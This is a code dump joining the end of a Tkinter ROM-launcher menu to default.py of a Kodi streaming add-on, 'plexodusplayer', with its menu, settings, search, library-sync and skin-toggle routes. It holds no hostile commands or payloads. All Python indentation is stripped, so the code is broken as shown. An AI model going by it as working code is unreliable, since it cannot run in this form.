Button(raiz,text="Pokemon Red" ,bg='gold',command=lambda:games("PokemonRed.gb") ,width=15).place(x=600,y=400,anchor="center")
Button(raiz,text="Pokemon Yellow" ,bg='gold',command=lambda:games("PokemonYellowVersion.gbc") ,width=15).place(x=600,y=450,anchor="center")
Button(raiz,text="Resident Evil" ,bg='gold',command=lambda:games("ResidentEvilGaiden.gbc") ,width=15).place(x=600,y=500,anchor="center")
Button(raiz,text="Shantae" ,bg='gold',command=lambda:games("Shantae.gbc") ,width=15).place(x=600,y=550,anchor="center")
Button(raiz,text="Simpsons" ,bg='gold',command=lambda:games("SimpsonsThe-NightoftheLivingTreehouseofHorror.gbc"),width=15).place(x=600,y=600,anchor="center")
Button(raiz,text="Super Mario World",bg='gold',command=lambda:games("Super_Mario_World.smc") ,width=15).place(x=600,y=650,anchor="center")
Button(raiz,text="Tetris" ,bg='gold',command=lambda:games("Tetris.gb") ,width=15).place(x=600,y=700,anchor="center")
Button(raiz,text="Tomb Raider" ,bg='gold',command=lambda:games("TombRaiderCurseoftheSword.gbc") ,width=15).place(x=600,y=750,anchor="center")
# Boton Apagar consolaa
########################################################################
Button(raiz,text="Apagar",bg='red',command=salir,width=15).place(x=600,y=800,anchor="center")
########################################################################
# Ejecución de la interfas grafica
###################################
raiz.mainloop()
###################################
|
default.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
if __name__ == '__main__':
import sys, os
reload(sys)
sys.setdefaultencoding("utf-8")
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'resources', 'lib'))
import os
import time
import shutil
import traceback
import xbmcaddon
from xbmcswift2 import xbmcplugin, xbmcvfs
from meta import plugin
from meta.utils.properties import get_property, set_property, clear_property
from meta.utils.rpc import RPC
from meta.gui import dialogs
from meta.play import updater
from meta.play.base import active_players, get_players, active_channelers
from meta.play.players import get_players, ADDON_SELECTOR
from meta.play.channelers import get_channelers, ADDON_PICKER
from meta.navigation.base import get_icon_path, get_background_path
import meta.navigation.movies
import meta.navigation.tvshows
import meta.navigation.live
import meta.navigation.music
import meta.navigation.lists
import meta.library.tvshows
import meta.library.movies
import meta.library.music
import meta.library.live
from meta.library.tools import channel_inventory, library_inventory
from language import get_string as _
from settings import *
from audiodb import audiodb
FORCE = plugin.get_setting(SETTING_FORCE_VIEW, bool)
VIEW = plugin.get_setting(SETTING_MAIN_VIEW, int)
addonid = 'plugin.video.plexodusplayer'
@plugin.route('/')
def root():
""" Root directory """
items = [
{
'label': _("Movies"),
'path': plugin.url_for("movies"),
'icon': get_icon_path("movies"),
'thumbnail': get_icon_path("movies"),
},
{
'label': _("TV shows"),
'path': plugin.url_for("tv"),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': _("music"),
'path': plugin.url_for("music"),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': _("TV channels"),
'path': plugin.url_for("live"),
'icon': get_icon_path("live"),
'thumbnail': get_icon_path("live"),
},
{
'label': _("Playlists"),
'path': plugin.url_for("lists"),
'icon': get_icon_path("lists"),
'thumbnail': get_icon_path("lists"),
'context_menu': [
(
_("Scan item to library"),
"RunPlugin({0})".format(plugin.url_for("lists_trakt_add_all_lists_to_library"))
)
],
},
{
'label': _("Enter search string"),
'path': plugin.url_for("root_search"),
'icon': get_icon_path("search"),
'thumbnail': get_icon_path("search"),
}
]
fanart = plugin.addon.getAddonInfo('fanart')
for item in items:
item['properties'] = {'fanart_image' : get_background_path()}
if FORCE == True: plugin.set_view_mode(VIEW); return items
else: return items
@plugin.route('/clear_cache')
def clear_cache():
""" Clear all caches """
for filename in os.listdir(plugin.storage_path):
file_path = os.path.join(plugin.storage_path, filename)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception, e:
traceback.print_exc()
dialogs.notify(msg='Cache', title='Deleted', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/update_library')
def update_library():
is_updating = get_property("updating_library")
is_syncing = get_property("syncing_library")
now = time.time()
if is_syncing and now - int(is_syncing) < plugin.get_setting(SETTING_UPDATE_LIBRARY_INTERVAL, int) * 60:
plugin.log.info("Skipping library sync")
else:
if plugin.get_setting(SETTING_LIBRARY_SYNC_COLLECTION, bool) == True or plugin.get_setting(
SETTING_LIBRARY_SYNC_WATCHLIST, bool) == True:
try:
set_property("syncing_library", int(now))
if plugin.get_setting(SETTING_LIBRARY_SYNC_COLLECTION, bool) == True:
meta.library.tvshows.sync_trakt_collection()
meta.library.movies.sync_trakt_collection()
if plugin.get_setting(SETTING_LIBRARY_SYNC_WATCHLIST, bool) == True:
meta.library.tvshows.sync_trakt_watchlist()
meta.library.movies.sync_trakt_watchlist()
except: plugin.log.info("something went wrong")
finally: clear_property("syncing_library")
else: clear_property("syncing_library")
if is_updating and now - int(is_updating) < 120:
plugin.log.debug("Skipping library update")
return
if plugin.get_setting(SETTING_LIBRARY_UPDATES, bool) == True:
try:
set_property("updating_library", int(now))
meta.library.tvshows.update_library()
meta.library.movies.update_library()
meta.library.music.update_library()
finally: clear_property("updating_library")
else: clear_property("updating_library")
@plugin.route('/authenticate_trakt')
def trakt_authenticate():
from trakt import trakt
trakt.trakt_authenticate()
@plugin.route('/settings/players/<media>')
def settings_set_players(media):
playericon = get_icon_path("player")
medias = ["movies","tvshows","musicvideos","music","live"]
if media == "all":
for med in medias:
mediatype = med.replace('es','e').replace('ws','w').replace('all','').replace('os','o').replace('vs','v s').replace('tv','TV').replace('musicvideo','Music video').replace('live','TV')
players = get_players(med)
selected = [p.id for p in players]
if selected is not None:
if med == "movies":
plugin.set_setting(SETTING_MOVIES_ENABLED_PLAYERS, selected)
elif med == "tvshows":
plugin.set_setting(SETTING_TV_ENABLED_PLAYERS, selected)
elif med == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, selected)
elif med == "music":
plugin.set_setting(SETTING_MUSIC_ENABLED_PLAYERS, selected)
elif med == "live":
plugin.set_setting(SETTING_LIVE_ENABLED_PLAYERS, selected)
else:
raise Exception("invalid parameter %s" % media)
dialogs.notify(msg="{0} {1}".format(_(mediatype).capitalize(), _("Player").lower()), title=_('Enabled'), delay=1000, image=get_icon_path("player"))
dialogs.notify(msg="{0}".format(_("Player")), title="{0} {1}".format(_("All"), _('Enabled').lower()), delay=1000, image=get_icon_path("player"))
return True
elif media == "tvportal":
players = get_players("live")
selected = [p.id for p in players]
plugin.set_setting(SETTING_LIVE_ENABLED_PLAYERS, selected)
return
else:
mediatype = media.replace('es','e').replace('ws','w').replace('all','').replace('os','o').replace('vs','v s').replace('tv','TV').replace('musicvideo','Music video').replace('live','TV')
players = get_players(media)
preselected = [p.id for p in active_players(media)]
players_list = [p.clean_title for p in players]
if media == "movies":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
elif media == "tvshows":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_TV_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_TV_ENABLED_PLAYERS, unicode)])
elif media == "musicvideos":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, unicode)])
elif media == "music":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MUSIC_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MUSIC_ENABLED_PLAYERS, unicode)])
elif media == "live":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_LIVE_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_LIVE_ENABLED_PLAYERS, unicode)])
players_total = players_off + players_on
version = xbmc.getInfoLabel('System.BuildVersion')
selected = None
msg = "{0}: {1}?".format(_("Enable"), _("All"))
if dialogs.yesno("{0} {1} ({2} = {3})".format(_("Enable"), _("Player").lower(), _("Type").lower(), _("%s" % mediatype)), msg):
selected = [p.id for p in players]
else:
if int(version[0:2]) > 15:
result = dialogs.multiselect("{0} {1} ({2} = {3})".format(_("Enable"), _("Player").lower(), _("Type").lower(), _("%s" % mediatype)), players_on + players_off)
if result is not None: selected = [players[i].id for i in result]
else:
enabled = None
while enabled != -1:
dialogs.notify(msg="Back / Close / Escape", title="To confirm, press:", delay=5000, image=get_icon_path("player"))
enabled = dialogs.select("[I]{0}[/I] / [B]{1}[/B] ".format(_("Disabled"), _("Enabled").lower()), players_off + players_on)
if (len(players_off) - 1) >= enabled > -1:
players_off.remove(players_total[enabled])
players_on.append(players_total[enabled].replace("I]","B]"))
players_on = sorted(players_on)
players_total = players_off + players_on
elif (len(players_total) - 1) >= enabled > (len(players_off) - 1):
players_on.remove(players_total[enabled])
players_off.append(players_total[enabled].replace("B]","I]"))
players_off = sorted(players_off)
players_total = players_off + players_on
selected = [players[players_list.index(i.replace("[B]","").replace("[/B]",""))].id for i in players_on]
if selected is not None and selected != preselected:
if media == "movies":
plugin.set_setting(SETTING_MOVIES_ENABLED_PLAYERS, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_ENABLED_PLAYERS, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_ENABLED_PLAYERS, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_ENABLED_PLAYERS, selected)
else:
raise Exception("invalid parameter %s" % media)
settings_set_default_player(media)
@plugin.route('/settings/channelers')
def settings_set_channelers():
medias = ["movies","tvshows","live"]
for media in medias:
channelers = get_channelers(media)
selected = [p.id for p in channelers]
if selected is not None:
if media == "movies":
plugin.set_setting(SETTING_MOVIES_ENABLED_CHANNELERS, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_ENABLED_CHANNELERS, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_ENABLED_CHANNELERS, selected)
else:
raise Exception("invalid parameter %s" % media)
print "Plexodus player Guidance: Movie, TV and Live players enabled"
return True
@plugin.route('/settings/default_channeler/<media>')
def settings_set_default_channeler(media):
channelers = active_channelers(media)
channelers.insert(0, ADDON_PICKER)
media = media.replace('es','e').replace('ws','w').replace('all','').replace('os','o').replace('vs','v s')
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format(_("Default").lower(), _("Player").lower()))), [p.title for p in channelers])
if selection >= 0:
selected = channelers[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_CHANNELER, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_CHANNELER, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_CHANNELER, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_CHANNELER, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_CHANNELER, selected)
else:
raise Exception("invalid parameter %s" % media)
@plugin.route('/settings/default_player/<media>')
def settings_set_default_player(media):
players = active_players(media)
players.insert(0, ADDON_SELECTOR)
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format(_("Default").lower(), _("Player").lower()))), [p.title for p in players])
if selection >= 0:
selected = players[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_PLAYER, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_PLAYER, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_PLAYER, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_PLAYER, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_PLAYER, selected)
else:
raise Exception("invalid parameter %s" % media)
plugin.open_settings()
@plugin.route('/settings/default_player_fromlib/<media>')
def settings_set_default_player_fromlib(media):
players = active_players(media)
players.insert(0, ADDON_SELECTOR)
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format(_("Library").lower(), _("Player").lower()))), [p.title for p in players])
if selection >= 0:
selected = players[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_PLAYER_FROM_LIBRARY, selected)
else:
raise Exception("invalid parameter %s" % media)
plugin.open_settings()
@plugin.route('/settings/default_player_fromcontext/<media>')
def settings_set_default_player_fromcontext(media):
players = active_players(media)
players.insert(0, ADDON_SELECTOR)
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format("context", _("Player").lower()))), [p.title for p in players])
if selection >= 0:
selected = players[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_PLAYER_FROM_CONTEXT, selected)
else:
raise Exception("invalid parameter %s" % media)
plugin.open_settings()
@plugin.route('/update_players')
@plugin.route('/update_players/<url>', name='update_players_url')
def update_players(url = None):
if url is None: url = plugin.get_setting(SETTING_PLAYERS_UPDATE_URL, unicode)
if updater.update_players(url): dialogs.notify(msg=_('Update'), title=_('Updated for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
else: dialogs.notify(msg=_('Update'), title=_('Failed for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
plugin.open_settings()
@plugin.route('/setup/total')
def total_setup():
dialogs.notify(msg='Total Setup', title=_("Start"), delay=1000, image=get_icon_path("metalliq"))
if sources_setup() == True: pass
if players_setup() == True: pass
dialogs.notify(msg='Total Setup', title=_("Done"), delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/setup/silent')
def silent_setup():
set_property("running","totalmetalliq")
movielibraryfolder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
try: meta.library.movies.auto_movie_setup(movielibraryfolder)
except: pass
tvlibraryfolder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
try: meta.library.tvshows.auto_tvshows_setup(tvlibraryfolder)
except: pass
musiclibraryfolder = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
try: meta.library.music.auto_music_setup(musiclibraryfolder)
except: pass
livelibraryfolder = plugin.get_setting(SETTING_LIVE_LIBRARY_FOLDER, unicode)
try: meta.library.live.auto_live_setup(livelibraryfolder)
except: pass
clear_property("running")
@plugin.route('/setup/players')
def players_setup():
set_property("running","totalmetalliq")
url = "https://api.github.com/repos/bcrusher29/players/zipball"
if updater.update_players(url): dialogs.notify(msg=_('Player'), title=_('Updated for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
else: dialogs.notify(msg=_('Player'), title=_('Failed for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/settings/players/all/)")
clear_property("running")
return True
@plugin.route('/setup/sources')
def sources_setup():
movielibraryfolder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
try:
meta.library.movies.auto_movie_setup(movielibraryfolder)
dialogs.notify(msg="{0}: {1} {2}".format(_('Movies'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("movies"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_("Movies"), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('Movies'), delay=1000, image=get_icon_path("movies"))
tvlibraryfolder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
try:
meta.library.tvshows.auto_tvshows_setup(tvlibraryfolder)
dialogs.notify(msg="{0}: {1} {2}".format(_('TV shows'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("tv"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_("TV shows"), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('TV shows'), delay=1000, image=get_icon_path("tv"))
musiclibraryfolder = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
try:
meta.library.music.auto_music_setup(musiclibraryfolder)
dialogs.notify(msg="{0}: {1} {2}".format(_('Music'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("music"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_("Music"), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('Music'), delay=1000, image=get_icon_path("music"))
livelibraryfolder = plugin.get_setting(SETTING_LIVE_LIBRARY_FOLDER, unicode)
try:
meta.library.live.auto_live_setup(livelibraryfolder)
dialogs.notify(msg="{0}: {1} {2}".format(_('TV'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("live"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_('TV'), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('TV'), delay=1000, image=get_icon_path("live"))
return True
@plugin.route('/search')
def root_search():
term = plugin.keyboard(heading=_("Enter search string"))
if term != None and term != "": return root_search_term(term)
else: return
@plugin.route('/search/edit/<term>')
def root_search_edit(term):
term = plugin.keyboard(default=term, heading=_("Enter search string"))
if term != None and term != "": return root_search_term(term)
else: return
@plugin.route('/search_term/<term>', options = {"term": "None"})
def root_search_term(term):
items = [
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Movies"), "TMDb"),
'path': plugin.url_for("tmdb_movies_search_term", term=term, page='1'),
'icon': get_icon_path("movies"),
'thumbnail': get_icon_path("movies"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Movies"), "Trakt"),
'path': plugin.url_for("trakt_movies_search_term", term=term, page='1'),
'icon': get_icon_path("movies"),
'thumbnail': get_icon_path("movies"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("TV shows"), "TMDb"),
'path': plugin.url_for("tmdb_tv_search_term", term=term, page='1'),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("TV shows"), "Trakt"),
'path': plugin.url_for("trakt_tv_search_term", term=term, page='1'),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("TV shows"), "TVDb"),
'path': plugin.url_for("tvdb_tv_search_term", term=term, page='1'),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Albums"), "LastFM"),
'path': plugin.url_for("music_search_album_term", term=term, page='1'),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Artists"), "LastFM"),
'path': plugin.url_for("music_search_artist_term", term=term, page='1'),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Tracks"), "LastFM"),
'path': plugin.url_for("music_search_track_term", term=term, page='1'),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Channels"), "Live addons"),
'path': plugin.url_for("live_search_term", term=term),
'icon': get_icon_path("live"),
'thumbnail': get_icon_path("live"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Playlists"), "Trakt"),
'path': plugin.url_for("lists_search_for_lists_term", term=term, page='1'),
'icon': get_icon_path("lists"),
'thumbnail': get_icon_path("lists"),
},
{
'label': "{0}: '{1}' ({2})".format(_("Search"), term, plugin.addon.getAddonInfo('name')),
'path': plugin.url_for("root_search_term", term=term, page='1'),
'icon': get_icon_path("search"),
'thumbnail': get_icon_path("search"),
},
{
'label': "{0} {1}".format(_("Edit"), _("Search string").lower()),
'path': plugin.url_for("root_search_edit", term=term),
'icon': get_icon_path("search"),
'thumbnail': get_icon_path("search"),
},
]
for item in items:
item['properties'] = {'fanart_image' : get_background_path()}
return items
@plugin.route('/toggle/preferred_toggle')
def toggle_preferred_toggle():
if xbmc.getCondVisibility("Skin.HasSetting(Toggling)") != True: dialogs.notify(msg="Toggling", title="Switched on", delay=5000, image=get_icon_path("metalliq"))
else: dialogs.notify(msg="Toggling", title="Switched off", delay=5000, image=get_icon_path("metalliq"))
xbmc.executebuiltin("Skin.ToggleSetting(Toggling)")
@plugin.route('/toggle/context_player')
def toggle_context_player():
if xbmc.getCondVisibility("Skin.HasSetting(Contexting)") != True: dialogs.notify(msg="Context player", title="Switched off", delay=5000, image=get_icon_path("metalliq"))
else: dialogs.notify(msg="Context player", title="Switched on", delay=5000, image=get_icon_path("metalliq"))
xbmc.executebuiltin("Skin.ToggleSetting(Contexting)")
@plugin.route('/toggle/acceleration')
def toggle_hardware_acceleration():
if xbmc.getCondVisibility("System.Platform.Android") == 1:
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useamcodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useamcodec","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useamcodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useamcodec","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usestagefright"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usestagefright","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usestagefright"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usestagefright","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodec","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodec","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface","value":true}, "id":1}')
else: pass
if xbmc.getCondVisibility("System.Platform.Linux.RaspberryPi") == 1:
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useomxplayer"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useomxplayer","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useomxplayer"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useomxplayer","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemmal"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemmal","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemmal"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemmal","value":true}, "id":1}')
else: pass
if xbmc.getCondVisibility("System.Platform.Windows") == 1:
response = xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usedxva2"}, "id":1}')
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usedxva2"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usedxva2","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usedxva2"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usedxva2","value":true}, "id":1}')
else: pass
@plugin.route('/toggle/skin')
def toggle_between_skins():
if xbmc.getCondVisibility("Skin.HasSetting(Contexting)") != True: contexting = False
else: contexting = True
if xbmc.getCondVisibility("Skin.HasSetting(Toggling)") != True: toggling = False
else: toggling = True
current_skin = str(xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"lookandfeel.skin"}, "id":1}')).replace('{"id":1,"jsonrpc":"2.0","result":{"value":"','').replace('"}}','')
primary_skin = plugin.get_setting(SETTING_PRIMARY_SKIN, unicode)
if primary_skin == "": plugin.set_setting(SETTING_PRIMARY_SKIN, current_skin)
alternate_skin = plugin.get_setting(SETTING_ALTERNATE_SKIN, unicode)
if alternate_skin == "":
if primary_skin != "skin.confluence" and primary_skin != "": plugin.set_setting(SETTING_ALTERNATE_SKIN, "skin.confluence")
else:
dialogs.notify(msg="Alternate skin", title="Not set", delay=5000, image=get_icon_path("metalliq"))
return openSettings(addonid, 5.7)
if primary_skin != alternate_skin and primary_skin != "" and alternate_skin != "" and xbmc.getCondVisibility('System.HasAddon(%s)' % primary_skin) and xbmc.getCondVisibility('System.HasAddon(%s)' % alternate_skin):
if current_skin != primary_skin:
xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"lookandfeel.skin","value":"%s"}, "id":1}' % primary_skin)
xbmc.executebuiltin('SetFocus(11)')
xbmc.executebuiltin('Action(Select)')
else:
xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"lookandfeel.skin","value":"%s"}, "id":1}' % alternate_skin)
xbmc.executebuiltin('SetFocus(11)')
xbmc.executebuiltin('Action(Select)')
xbmc.sleep(2000)
if contexting == False and xbmc.getCondVisibility("Skin.HasSetting(Contexting)") == True: toggle_context_player()
elif contexting == True and xbmc.getCondVisibility("Skin.HasSetting(Contexting)") == False: toggle_context_player()
else: pass
if toggling == False and xbmc.getCondVisibility("Skin.HasSetting(Toggling)") == True: toggle_preferred_toggle()
